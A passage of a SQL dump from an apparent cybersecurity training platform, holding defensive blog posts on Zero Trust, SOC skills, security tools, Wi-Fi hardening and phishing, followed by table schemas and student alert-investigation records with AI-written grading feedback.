Even if an employee accesses the corporate network through a VPN, they\'ll still need to verify their identity when accessing critical applications like CRM software.\n\n### 3. Microsegmentation\n\nMicrosegmentation involves dividing networks into smaller, secure zones to limit unauthorized access. Think of it as breaking your network into \"rooms,\" where only authorized users can enter specific areas. This drastically reduces an attacker\'s ability to move laterally within the system.\n\n**Use Case**: Finance databases and marketing data exist in separate network segments to ensure that even if one is compromised, the other remains unaffected.\n\n### 4. Assume Breach\n\nZero Trust operates under the assumption that breaches are inevitable. This paradigm shifts focus from breach prevention alone to rapid detection, containment, and recovery. Strategies like advanced threat detection and real-time monitoring support this principle.\n\n**Implementation Tip**: Use tools like Security Information and Event Management (SIEM) and Endpoint Detection and Response (EDR) for enhanced visibility and incident response.\n\n## Benefits of Zero Trust Security\n\nZero Trust is not just a buzzword — it delivers tangible benefits crucial for modern enterprises. Here’s how adopting Zero Trust can bolster your organization’s defenses:\n\n### 1. Reduces the Attack Surface\n\nBy requiring continuous verification and tightly controlling access, Zero Trust minimizes the number of vulnerable entry points for attackers. This is especially important for companies operating in distributed environments with remote employees and hybrid clouds.\n\n### 2. Improves Threat Detection\n\nWith real-time monitoring and analytics, Zero Trust systems can identify unusual patterns and potential threats more effectively. Instead of relying on perimeter defenses, it emphasizes visibility across every layer of the IT ecosystem.\n\n### 3. Protects Against Insider Threats\n\nInsider threats, whether intentional or accidental, remain a significant risk. By restricting access and enforcing granular controls, Zero Trust ensures that no single user has unchecked access.\n\n**Statistic**: According to a report by Verizon, 19% of breaches in 2023 involved insider threats. Zero Trust directly addresses this issue.\n\n### 4. Strengthens Regulatory Compliance\n\nRegulations such as GDPR, HIPAA, and CCPA demand strict data protection measures. Zero Trust frameworks simplify compliance by providing comprehensive activity logging, encryption, and access control measures.\n\n### 5. Enhances User Experience\n\nWhile Zero Trust may sound rigid, its use of technologies like Single Sign-On (SSO) and MFA balances security with user convenience. Employees can securely access the resources they need without constant disruptions.\n\n## A Simplified Roadmap to Zero Trust Implementation\n\nImplementing Zero Trust may seem overwhelming, but with a deliberate approach, businesses can reap its rewards. Here\'s a step-by-step roadmap to get started:\n\n### Step 1. Evaluate Your Current Security Posture\n\nBegin by assessing your existing security framework. Identify assets (data, systems, devices), potential vulnerabilities, and privileged access points. This step helps you understand where to focus your efforts.\n\n### Step 2. Adopt Identity and Access Management (IAM)\n\nDeploy tools like MFA, SSO, and user identity verification solutions. Establish RBAC to ensure each employee only has access to necessary applications and data.\n\n- **Tool Example**: Okta or Microsoft Azure AD for IAM implementation.\n\n### Step 3. Segment Your Network\n\nIntroduce microsegmentation to create secure network zones. Use firewalls, virtual LANs (VLANs), or cloud-native security tools to isolate sensitive data and systems.\n\n### Step 4. Enforce Continuous Monitoring and Analytics\n\nImplement monitoring tools that provide real-time insights and raise alerts in the presence of anomalies. Advanced analytics can proactively identify potential risks.\n\n- **Recommended Tools**: SIEM platforms like Splunk or IBM QRadar.\n\n### Step 5. Pilot and Iterate\n\nStart small by applying Zero Trust to a single department or system. Gather feedback, assess the results, and scale based on lessons learned.\n\n### Step 6. Educate and Communicate\n\nZero Trust is not a \"set-it-and-forget-it\" model. Continuous employee training and communication are necessary to sustain your framework’s effectiveness.\n\n## Securing the Future with Zero Trust\n\nThe cyber threat landscape is constantly evolving, and outdated security models can no longer keep pace. Zero Trust Security offers businesses and IT leaders a proactive, modern solution to safeguard data, users, and systems in today’s complex environments.', '', 'http://infoseclabs.io/uploads/1767841056902-416013144.png', 'Illustration of a secure digital network representing Zero Trust principles', 1, 'published', '2026-01-07 21:57:00', '2026-01-08 05:57:37', 'Information Security', 'Zero Trust Security: A New Standard in Cyber Defense', 'Discover why Zero Trust Security is essential for safeguarding data in today\'s complex cyber landscape.', 'Zero Trust Security'), (26, 'Top 10 Things Every SOC Analyst Should Know Inside Out', 'top-10-things-every-soc-analyst-should-know-inside-out', '# The Essential Skills for a SOC Analyst\n\nThe role of a Security Operations Center (SOC) Analyst demands vigilance, adaptability, and expertise. A SOC Analyst is the frontline defender in an organization\'s cybersecurity, tasked with monitoring, analyzing, and responding to potential threats before they escalate. What sets an exceptional SOC Analyst apart from a proficient one is a blend of core cybersecurity knowledge and practical, hands-on skills.\n\nWhether you\'re just starting your cybersecurity career or looking to deepen your expertise, this guide outlines the top 10 things every SOC Analyst should know. These essentials form the foundation of defending against cyberattacks and navigating the complex digital threat landscape.\n\n## 1. Master Networking Fundamentals\n\nA sound understanding of network operations is crucial for effectively detecting and mitigating cyber threats. SOC Analysts should have in-depth knowledge of foundational networking concepts, including:\n\n- **TCP/IP Protocol Suite**: Understanding IP addressing, packets, and how data moves across networks.\n- **OSI Model**: Knowing the seven layers of networking (physical, data link, network, transport, session, presentation, application) to identify vulnerabilities and pinpoint network issues.\n- **Subnetting**: Recognizing how subnetting divides large networks into smaller segments to enhance security and efficiency.\n- **Common Ports and Protocols**: Recognizing unusual use of ports (e.g., HTTP on port 80, HTTPS on port 443, FTP on port 21) can signal potential breaches.\n\nThis knowledge allows analysts to uncover anomalies in their environments while confidently troubleshooting network issues.\n\n## 2. Understand Security Principles\n\nTo effectively secure systems, an analyst must grasp fundamental security principles. These key concepts underpin almost every cybersecurity framework used today:\n\n- **CIA Triad (Confidentiality, Integrity, Availability)**: A guide to balancing data protection, ensuring that sensitive information is only accessible by authorized individuals (confidentiality), not tampered with (integrity), and available (availability) when needed.\n- **Least Privilege**: Ensuring users and systems only have access to what\'s strictly necessary to perform their functions.\n- **Defense in Depth**: A multi-layered security strategy where multiple measures protect a system. Even if one layer fails, others continue to provide protection.\n\nThese principles create the groundwork for strong security practices.\n\n## 3. Know Common Attack Vectors\n\nUnderstanding how attackers infiltrate systems helps SOC Analysts effectively detect and respond to threats. Familiarize yourself with these common attack methods:\n\n- **Malware (e.g., viruses, ransomware, Trojans, worms)**: Software designed to disrupt, damage, or gain unauthorized access to systems.\n- **Phishing**: One of the most prevalent attacks, where users are tricked into revealing sensitive information or clicking malicious links.\n- **Distributed Denial of Service (DDoS)**: Attacks that overwhelm systems and networks to disrupt services.\n- **SQL Injection**: Exploiting vulnerabilities in database queries to gain unauthorized access to data.\n\nKnowing how these attacks work and recognizing their signs equips SOC Analysts to act swiftly and decisively.\n\n## 4. Get Comfortable with Security Tools\n\nSOC Analysts rely heavily on security tools to detect, analyze, and report incidents. To excel, be proficient in these key categories of tools:\n\n- **SIEM (Security Information and Event Management) Systems**: Tools like Splunk, IBM QRadar, or Elastic stack for analyzing events across the IT infrastructure.\n- **IDS/IPS (Intrusion Detection/Prevention Systems)**: Tools such as Snort or Zeek to identify and prevent suspicious activity.\n- **Firewalls**: Important for perimeter monitoring—SOCs often need to understand configuration rules and logs.\n- **Endpoint Detection and Response (EDR)**: Tools like CrowdStrike or Carbon Black that focus on endpoint security.\n\nHands-on experience is invaluable. Most employers will value proficiency in at least one tool in these categories.\n\n## 5. Master Log Analysis\n\nSOC Analysts process vast amounts of data daily, so the ability to analyze logs for security incidents is crucial. Logs are recorded across practically every network entity—firewalls, servers, routers—and contain vital clues about suspicious activity. Analysts should be able to:\n\n- Recognize patterns of malicious behavior across logs.\n- Filter and correlate data from multiple sources using SIEM systems.\n- Look out for anomalies like unusual login attempts or unauthorized file access.\n\nDeveloping sharp log analysis skills ensures no potential incident escapes detection.\n\n## 6. Understand Incident Response\n\nSOC Analysts play a critical role in the incident response lifecycle. Familiarity with these key steps provides structure in high-pressure situations:\n\n1. **Identification**: Recognize and verify the security incident.\n2. **Containment**: Isolate the affected systems to stop further damage.\n3. **Eradication**: Remove malicious entities from the network.\n4. **Recovery**: Restore systems and normal business functions without recurring vulnerabilities.\n5. **Post-Incident Analysis**: Document the event thoroughly and improve systems to prevent recurrence.\n\nSticking to a structured incident response plan minimizes downtime and improves organizational resilience.\n\n## 7. Grasp Threat Intelligence\n\nThreat intelligence gives SOC Analysts a proactive edge by helping them understand the broader cyber threat landscape. Analysts should focus on:\n\n- **Threat Actors**: Understanding who might target their company (e.g., nation-states, hacktivists, or insider threats).\n- **Tactics, Techniques, and Procedures (TTPs)**: Used by cybercriminals.\n- Tracking global or industry-specific emerging threats.\n\nUsing data from platforms like MITRE ATT&CK, VirusTotal, or Recorded Future will help your organization understand and prepare for potential risks.\n\n## 8. Stay Compliant with Regulations\n\nSOC Analysts must also align with compliance frameworks and regulations that secure data and protect privacy. Familiarize yourself with:\n\n- **GDPR**: For privacy compliance in Europe.\n- **HIPAA**: For handling healthcare data.', '', 'http://infoseclabs.io/uploads/1767909003079-180527002.png', 'SOC Analyst monitoring cybersecurity threats on computer screens', 1, 'published', '2026-01-08 16:49:00', '2026-01-09 00:50:08', 'Information Security', '10 Essentials Every SOC Analyst Must Know', 'Discover the top 10 skills every SOC Analyst needs to excel in cybersecurity defense.', 'SOC Analyst'), (27, 'Exploring Open Source Tools for Cybersecurity Professionals', 'exploring-open-source-tools-for-cybersecurity-professionals', '# The Dynamic World of Cybersecurity Tools\n\nThe cybersecurity landscape is dynamic, challenging, and undeniably vital in today’s technology-driven world. Whether you\'re an aspiring SOC analyst, a network administrator, or someone interested in safeguarding digital assets, having the right tools at your disposal is critical. This is where open-source cybersecurity tools shine.\n\nThese tools are not just cost-effective but community-driven, continuously evolving, and highly customizable. From analyzing your network traffic to identifying vulnerabilities and monitoring potential threats, open-source tools are integral to ensuring robust cybersecurity. This blog explores three essential tools—Wireshark, Metasploit, and Snort—that every cybersecurity professional, beginner, or enthusiast should know about.\n\n## What Are Open Source Cybersecurity Tools?\n\nOpen-source cybersecurity tools are software programs with their source code made freely available to the public. This allows users to access, modify, and distribute the software in line with their specific needs.\n\n### Benefits of Open Source Tools:\n\n- **Cost-efficiency**: They’re generally free, making them accessible to anyone, including students and small organizations.\n- **Community Support**: Contributions from worldwide cybersecurity experts enhance features and fix vulnerabilities quickly.\n- **Customizability**: Users can tailor these tools to meet their unique cybersecurity requirements.\n\nFor cybersecurity roles, ranging from penetration testing to network administration, these tools offer the flexibility and power to perform critical tasks efficiently. Now, let\'s dig deep into three open-source giants in the cybersecurity space.\n\n## Wireshark: The Go-To Tool for Network Analysis\n\nWireshark is one of the most widely used open-source tools for network protocol analysis. Its comprehensive set of features allows users to capture, inspect, and analyze network traffic in real-time. Whether you’re troubleshooting network issues or detecting malicious activity, Wireshark can give you the insights you need.\n\n### Capabilities of Wireshark\n\n- Captures and inspects data packets across a network.\n- Identifies unusual spikes or suspicious traffic for further analysis.\n- Deciphers protocols and displays data in human-readable formats.\n- Offers filters to zero in on specific traffic (e.g., filtering by IP addresses or specific protocols).\n\n### How to Use Wireshark\n\n1. **Download and Install**: \n Visit the [official Wireshark website](https://www.wireshark.org/) to download the software for your operating system.\n\n2. **Capture Network Traffic**: \n Open Wireshark and choose the appropriate network interface (e.g., Wi-Fi, Ethernet). Click \"Start\" to begin capturing live data.\n\n3. **Apply Filters**: \n Use Wireshark’s powerful filters to narrow down your results. For example:\n - `http` filters for HTTP traffic.\n - `ip.src == [IP]` filters for packets originating from a specific IP address.\n\n4. **Analyze Data Packets**: \n Inspect individual packets for payloads, source/destination addresses, or protocol details.\n\n### Practical Use Cases\n\n- Troubleshooting network performance issues.\n- Identifying unauthorized devices on a network.\n- Detecting potential data breaches or malware communications.\n\nWireshark is invaluable for maintaining network transparency and spotting anomalies.\n\n## Metasploit: The Ultimate Penetration Testing Framework\n\nIf Wireshark is for monitoring, Metasploit is for offense. Metasploit is an open-source penetration testing framework that allows cybersecurity professionals to test system vulnerabilities by simulating cyberattacks in controlled environments.\n\n### Introduction to Metasploit\n\nMetasploit combines a massive library of exploits, payloads, and auxiliary tools to test the resilience of various systems against attacks. It’s widely used by ethical hackers to identify vulnerabilities before malicious actors exploit them.\n\n### Steps to Perform Vulnerability Testing with Metasploit\n\n1. **Setup and Installation**: \n Download Metasploit from the [Rapid7 website](https://www.metasploit.com/). It supports Linux, Windows, and macOS.\n\n2. **Select a Target**: \n Identify the system or service you want to test and gather its IP address or hostname.\n\n3. **Choose an Exploit**: \n Look for known vulnerabilities in Metasploit\'s database (use the `search [vulnerability]` command).\n\n4. **Test with a Payload**: \n Select a payload (e.g., reverse shell) and configure the parameters.\n\n5. **Execute Test**: \n Launch your simulated attack responsibly within a controlled setup.\n\n### Executors Beware! Use Metasploit Safely\n\n- Only use Metasploit in test environments or on systems you are authorized to test.\n- Always notify relevant stakeholders if you’re testing workplace systems.\n\nEthical hacking with Metasploit enables you to patch vulnerabilities before attackers can exploit them.\n\n## Snort: Your Intrusion Detection and Prevention Ally\n\nSnort, authored by Cisco Talos, is a popular open-source intrusion detection system (IDS) and intrusion prevention system (IPS). \n\n--- \n\nBy understanding and utilizing these open-source tools, you can significantly enhance your cybersecurity posture, whether you are monitoring network traffic, testing vulnerabilities, or preventing intrusions.', '', 'http://infoseclabs.io/uploads/1767909071893-784433651.jpg', 'Cybersecurity tools concept with digital security icons', 1, 'published', '2025-12-25 08:51:00', '2026-01-09 00:52:20', 'Information Security', 'Top Open Source Tools for Cybersecurity Experts', 'Discover the best open-source tools like Wireshark, Metasploit, and Snort for effective cybersecurity management.', 'Open Source Cybersecurity'), (28, 'Secure Your Wi-Fi: Tips for a Stronger Network at Home', 'secure-your-wi-fi-tips-for-a-stronger-network-at-home', '# Securing Your Home Wi-Fi Network\n\nYour home Wi-Fi network is more than just an internet connection—it\'s the gateway to personal data, banking details, smart home devices, and much more. With the rise in cybersecurity threats, leaving your Wi-Fi network unprotected is like leaving your front door wide open. This guide will walk you through steps to secure your Wi-Fi and ensure that your network, and everything connected to it, stays safe from prying eyes.\n\nWhether you\'re an IT professional or someone simply looking to secure their home, these tips will help you create a stronger, safer network.\n\n## Understanding Wi-Fi Security Protocols\n\nWhen setting up your Wi-Fi, you\'ll encounter different security protocols. Understanding these is crucial for making informed decisions about your network\'s protection.\n\n- **WEP (Wired Equivalent Privacy)** – Outdated and highly vulnerable to attacks. Avoid this protocol.\n- **WPA (Wi-Fi Protected Access)** – A significant improvement over WEP, but now considered obsolete.\n- **WPA2** – Widely used and more secure than WPA. It\'s a good standard but not foolproof anymore.\n- **WPA3** – The most secure protocol currently available. If your router supports this, make sure to enable it.\n\n**Pro tip**: Always opt for WPA3 if it’s supported by your router and devices. If not, WPA2 should be your fallback.\n\n## Setting a Strong Password\n\nA weak Wi-Fi password is an open invitation to hackers. Here’s how to create a password that’s tough to crack but easy for you to remember:\n\n- Use at least 12 characters.\n- Combine uppercase and lowercase letters, numbers, and special characters.\n- Avoid using common words, names, or birthdates.\n- Use a passphrase, like \"My$SecureWi-Fi123\", that’s unique but memorable.\n\n**Pro tip**: Try a password manager to generate and store strong passwords securely.\n\n## Enabling Network Encryption\n\nEncryption scrambles your data, making it unreadable to unauthorized users. Most modern routers support encryption protocols like WPA2 or WPA3.\n\n### Step-by-step guide:\n\n1. Log in to your router’s admin panel (usually via a browser—check your router’s manual).\n2. Locate the wireless security settings.\n3. Select WPA3 (or WPA2 if WPA3 isn’t available).\n4. Save and reboot your router to apply changes.\n\n## Regularly Updating Firmware\n\nYour router’s firmware is essentially its operating system. Manufacturers frequently release updates to fix bugs and patch security vulnerabilities.\n\n1. Log in to your router’s admin panel.\n2. Check for a firmware update option (often found under “System” or “Settings”).\n3. Download and install updates as they become available.\n\n**Pro tip**: Some routers have auto-update features—enable this if it’s available.\n\n## Enabling Firewall Protection\n\nA firewall adds an additional layer of defense by monitoring and blocking malicious traffic. Many modern routers come with a built-in firewall, but it’s often disabled by default.\n\n- Log into your router’s admin settings and activate the firewall.\n- For advanced users, configure custom rules to enhance protection further.\n\n## Disabling WPS\n\nWi-Fi Protected Setup (WPS) was designed for convenience but is now recognized as a security vulnerability. Hackers can exploit WPS to gain unauthorized access.\n\nTo disable it:\n\n1. Go to the admin panel of your router.\n2. Find the WPS settings under “Wireless” or “Advanced settings.”\n3. Turn it off.\n\n## Changing the Default SSID\n\nThe default Service Set Identifier (SSID) is usually the brand name of your router, which makes it easier for attackers to identify and exploit its vulnerabilities.\n\n- Rename your network to something unique and unrelated to your name or address.\n- Avoid using personal information like your last name in the SSID.\n\n**Pro tip**: A generic name like “CoffeeHouse_Network” works well to obscure your identity.\n\n## Implementing MAC Address Filtering\n\nEvery device that connects to your network has a unique MAC address. By enabling MAC address filtering, you can control which devices are allowed to connect.\n\n1. Log in to your router’s admin panel and look for “MAC Filtering” under wireless or security settings.\n2. Add the MAC addresses of your trusted devices to the whitelist.\n\n**Note**: This method isn’t foolproof, as advanced hackers can spoof MAC addresses, but it adds an extra layer of defense.\n\n## Monitoring Connected Devices\n\nKeeping track of who is on your network helps you detect any unauthorized access.\n\n- Use your router’s admin panel to view a list of connected devices.\n- Regularly check for names or MAC addresses you don’t recognize.\n- Kick off intruders and change your Wi-Fi password if necessary.\n\n## Using a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic and masks your IP address, adding extra protection against hackers.\n\n- Install a VPN on your router to secure every device connected to your network.\n- Alternatively, install a VPN on individual devices for more flexibility.\n\n## Setting Up a Guest Network\n\nAllowing visitors to connect to your main Wi-Fi puts your entire network at risk. Instead, create a guest network with limited access.\n\n1. Open your router’s settings.\n2. Look for “Guest Network” under wireless options.\n3. Assign a separate SSID and password for guests.\n\nThis keeps your main network safe while providing your visitors with internet access.', '', 'http://infoseclabs.io/uploads/1767909243749-760907848.png', 'Home Wi-Fi network security with router and firewall protection', 1, 'published', '2026-01-08 08:54:00', '2026-01-09 00:54:29', 'Information Security', 'Secure Your Wi-Fi: Tips for a Stronger Network', 'Learn essential tips to secure your home Wi-Fi network and protect personal data from cyber threats.', 'Wi-Fi security'), (29, 'Anatomy of a Phishing Attack: How to Recognize the Signs', 'anatomy-of-a-phishing-attack-how-to-recognize-the-signs', '# Understanding Phishing Attacks: A Comprehensive Guide\n\nPhishing attacks are among the most common cybersecurity threats affecting businesses today. Whether it\'s a cleverly disguised email or a fraudulent website, phishing can result in financial loss, stolen data, and compromised systems. Yet, despite its prevalence, many small business owners and professionals remain unsure about how to identify and defend against these attacks.\n\nThis blog will guide you through the ins and outs of phishing campaigns. We\'ll cover the various types of phishing attacks, key signs to watch out for, real-world examples, and actionable steps to protect your business. By the end, you\'ll have the knowledge and tools to stay a step ahead of cybercriminals.\n\n## What Are Phishing Attacks?\n\nPhishing is a type of cyberattack where hackers pose as legitimate entities to trick victims into providing sensitive information, such as passwords, credit card numbers, or company data. These attacks are often carried out via fake emails, websites, or messages designed to appear highly authentic, making them difficult to spot.\n\nPhishing is the foundation of many larger cybercrimes, from ransomware attacks to financial fraud, making it essential for businesses to understand and mitigate these risks.\n\n### Why Are Small Businesses and Startups at Risk?\n\nSmaller businesses may not have the extensive cybersecurity measures that larger enterprises often possess, making them attractive targets for hackers. Entrepreneurs and IT professionals managing growing organizations are often juggling multiple priorities, increasing the likelihood of an attack slipping through unnoticed.\n\nUnderstanding phishing on a deeper level is the first step in fortifying your operations.\n\n## Common Types of Phishing Attacks\n\nPhishing tactics come in several forms, each tailored to exploit different types of vulnerabilities. Here’s a breakdown:\n\n### 1. Email Phishing\n\nThe most common form, email phishing, involves attackers sending messages that appear to come from trusted sources. These emails often include urgent calls to action, like \"Your account will be locked in 24 hours. Click here to reset your password.\"\n\n### 2. Spear Phishing\n\nUnlike generic phishing, spear phishing targets specific individuals or companies. Attackers often do their homework, researching their victim\'s job title and organization to craft personalized messages that feel legitimate.\n\n### 3. Clone Phishing\n\nThis involves creating a nearly identical copy of a legitimate email that the recipient has already received. By adding malicious links or attachments, attackers can exploit the trust the recipient places in the sender.\n\n### 4. Vishing (Voice Phishing)\n\nPhishing isn\'t limited to the digital space. Vishing uses phone calls to trick people into revealing sensitive information, often posing as a bank or tech support.\n\n### 5. Smishing (SMS Phishing)\n\nSimilar to email attacks, smishing occurs through text messages. These usually contain a malicious link, urging users to act quickly.\n\n### 6. Pharming\n\nPharming redirects users from a legitimate website to a fraudulent one, often by exploiting DNS servers. Once on the fake site, users unwittingly input critical data.\n\nUnderstanding these forms allows you to better anticipate and defend against phishing tactics.\n\n## Key Signs of a Phishing Email\n\nPhishing emails often appear legitimate, but close inspection can reveal inconsistencies. Here are key signs to look out for:\n\n1. **Suspicious Sender Addresses** \n Legitimate companies always use official email domains. Watch out for subtle misspellings like “@paypa1.com” instead of “@paypal.com.”\n\n2. **Urgency or Fear-Based Subject Lines** \n Attackers create a sense of panic to compel immediate action, such as “Your bank account has been compromised!”\n\n3. **Generic Greetings** \n Phishing emails often use vague greetings like “Dear customer” instead of your name.\n\n4. **Unexpected Attachments** \n Legitimate sources are unlikely to send attachments you didn’t request. Malicious attachments can infect your system with malware.\n\n5. **Links with Mismatched URLs** \n Hover over any links before clicking. A mismatch between the text and URL is a major red flag.\n\nThe devil is in the details when it comes to phishing, so slow down and review suspicious emails carefully.\n\n## Technical Indicators to Watch Out For\n\nBeyond visual cues, phishing emails often contain technical abnormalities:\n\n- **Misspelled URLs:** Check for slight deviations in trusted web addresses.\n- **Lack of HTTPS Security:** Legitimate companies use secure “https://” websites, especially for transactions.\n- **Unusual Metadata:** Analyzing an email’s header or source code can sometimes reveal forgery.\n\nTools that flag these issues, such as URL checkers or email filters, can help identify phishing attempts before the damage is done.\n\n## Real-World Phishing Case Studies\n\n### Case Study 1: The Google and Facebook Scam\n\nAttackers successfully scammed Google and Facebook out of over $100 million by posing as a legitimate vendor through fake invoices. Both companies fell for the trap and paid the fraudulent bills, showing that even tech giants aren’t immune.\n\n### Case Study 2: The Target Data Breach\n\nHackers gained access to Target\'s systems by spear phishing an HVAC subcontractor. The breach compromised 40 million customer credit card details and cost Target millions in lawsuits.\n\nThese real-world examples highlight the effectiveness of phishing and the critical need for preventative measures.\n\n## Steps to Take If You Suspect a Phishing Attempt\n\nIf you suspect an email or message is a phishing attempt, here’s what to do:\n\n1. **Don’t Click Links or Download Attachments:** \n Avoid engaging with suspected phishing content.\n\n2. **Verify the Sender:** \n Contact the company directly using official channels to confirm legitimacy.\n\n3. **Report the Email:** \n Most email providers allow you to flag suspicious emails as “phishing.”\n\n4. **Update Passwords:** \n If you’ve interacted with a phishing scam, immediately change affected passwords.\n\nHaving clear protocols for suspected phishing attempts can mitigate damage quickly.\n\n## Tools and Technologies to Protect Against Phishing\n\nLeveraging technology is critical in staying ahead of phishing threats. Consider using:\n\n1. **Email Security Software:** \n Tools like Mimecast and Proofpoint identify and filter phishing content.\n\n2. **Web Filtering Tools:** \n Prevent access to malicious websites with tools like OpenDNS.', '', 'http://infoseclabs.io/uploads/1767909305235-538274400.png', 'Illustration of a deceptive phishing email targeting a business', 1, 'published', '2026-01-08 16:55:00', '2026-01-09 00:55:55', NULL, 'Recognizing Phishing Attacks: Key Signs & Protection', 'Learn to recognize phishing attacks and protect your business from common cybersecurity threats with this comprehensive guide.', 'Phishing Attacks'); -- -------------------------------------------------------- -- -- Table structure for table `feedbacks` -- DROP TABLE IF EXISTS `feedbacks`; CREATE TABLE `feedbacks` ( `id` int(11) NOT NULL, `user_id` int(11) DEFAULT NULL, `grade` int(11) DEFAULT NULL, `feedback` text DEFAULT NULL, `created_at` datetime DEFAULT current_timestamp(), `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp() ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci; -- -------------------------------------------------------- -- -- Table structure for table `investigations` -- DROP TABLE IF EXISTS `investigations`; CREATE TABLE `investigations` ( `id` int(11) NOT NULL, `user_id` int(11) NOT NULL, `alert_id` int(11) NOT NULL, `status` varchar(50) DEFAULT 'investigating', `grade` int(11) DEFAULT NULL, `feedback` text DEFAULT NULL, `executive_summary` text DEFAULT NULL, `ai_summary` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, `ai_evaluation_scheduled_at` datetime DEFAULT NULL, `created_at` timestamp NULL DEFAULT current_timestamp(), `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(), `is_reported` tinyint(1) DEFAULT 0, `report_reason` text DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci; -- -- Dumping data for table `investigations` -- INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES (27, 29, 221, 'investigating', NULL, NULL, '{\"verdict\":\"Benign\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 23/12/2025\\n**Verdict:** Benign\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Phishing**.\\n\\n### Key Findings & Artifacts\\n- IP: 203.0.113.5\\n- Hash: d41d8cd98f00b204e9800998ecf8427e\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nClose Alert (False Positive)\",\"conclusion\":\"This alert is classified as a Benign based on the following findings:\\n\\n1. The identified artifacts (203.0.113.5, d41d8cd98f00b204e9800998ecf8427e) were analyzed and determined to be inconclusive.\\n\\n2. Impact Assessment: No malicious activity was confirmed. This appears to be legitimate activity.\\n\\n3. Recommended Actions: No further action required. Alert can be safely closed.\"},\"artifacts\":[{\"type\":\"IP\",\"value\":\"203.0.113.5\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Phishing\",\"action_taken\":[\"Close Alert (False Positive)\"]},\"submitted_at\":\"2025-12-23T17:48:26.422Z\"}', '{\"verdict_correctness\":\"Incorrect\",\"key_findings\":\"The sending server was suspicious, which aligns with characteristics of phishing.\",\"missed_items\":[\"suspicious sending server\",\"potential phishing intention\"],\"strengths\":\"You made the effort to classify the attack category. Your initiative in closing the alert, assuming it was a false positive, shows you are thinking critically, even if the conclusion was incorrect.\"}', NULL, '2025-12-23 17:35:10', '2026-01-02 02:40:31', 1, '.'), (28, 30, 221, 'investigating', NULL, NULL, NULL, NULL, '2025-12-24 00:24:17', '2025-12-23 21:17:17', '2025-12-23 21:17:17', 0, NULL), (29, 30, 218, 'investigating', NULL, NULL, NULL, NULL, '2025-12-24 00:26:28', '2025-12-23 21:19:28', '2025-12-23 21:19:28', 0, NULL), (30, 31, 221, 'investigating', NULL, NULL, NULL, NULL, '2025-12-24 04:28:45', '2025-12-24 01:20:45', '2025-12-24 01:20:45', 0, NULL), (41, 36, 233, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-26T13:53:32.177Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The email sender domain is spoofed to look like a trusted entity. The URL in the email is a clear indicator of phishing, and the IP should be flagged as suspicious.\",\"missed_items\":[\"Analysis or actions taken\",\"Artifacts like URL and IP should be highlighted\",\"Executive summary\"],\"strengths\":\"The analyst correctly determined the appropriate verdict.\"}', NULL, '2025-12-26 13:51:38', '2026-01-02 02:40:31', 0, NULL), (44, 41, 240, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:33:40.336Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The PowerShell command was identified as potentially malicious due to its encoded nature and execution with high integrity.\",\"missed_items\":[\"Analysis of the decoded command\",\"Summary and conclusion of findings\",\"Action plan or recommendation\"],\"strengths\":\"The analyst has successfully identified the event as suspicious, which is the main takeaway needed in incident response.\"}', NULL, '2025-12-27 10:31:24', '2026-01-02 02:40:31', 0, NULL), (45, 41, 242, 'investigating', NULL, NULL, NULL, NULL, '2025-12-27 13:50:44', '2025-12-27 10:42:44', '2025-12-27 10:42:44', 0, NULL), (46, 41, 241, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:44:02.144Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The analyst should have noted the use of PowerShell with Invoke-Expression to download a script from a questionable URL, indicative of potentially malicious activity.\",\"missed_items\":[\"Detailed analysis or actions taken\",\"Key artifacts such as the URL and file hash\"],\"strengths\":\"Correctly identified the event as a true positive.\"}', NULL, '2025-12-27 10:42:49', '2026-01-02 02:40:31', 0, NULL), (47, 44, 166, 'investigating', NULL, NULL, NULL, NULL, '2025-12-28 00:05:00', '2025-12-27 21:00:00', '2025-12-27 21:00:00', 0, NULL), (49, 48, 250, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-28T19:35:10.935Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The encoded PowerShell command decodes to \'echo This is a test.\', suggesting benign activity.\",\"missed_items\":[\"Decoded command content: echo This is a test.\",\"Proof of benign activity through decoded script\"],\"strengths\":\"Identified the activity as false positive correctly.\"}', NULL, '2025-12-28 19:33:42', '2026-01-02 02:40:31', 0, NULL), (51, 54, 255, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 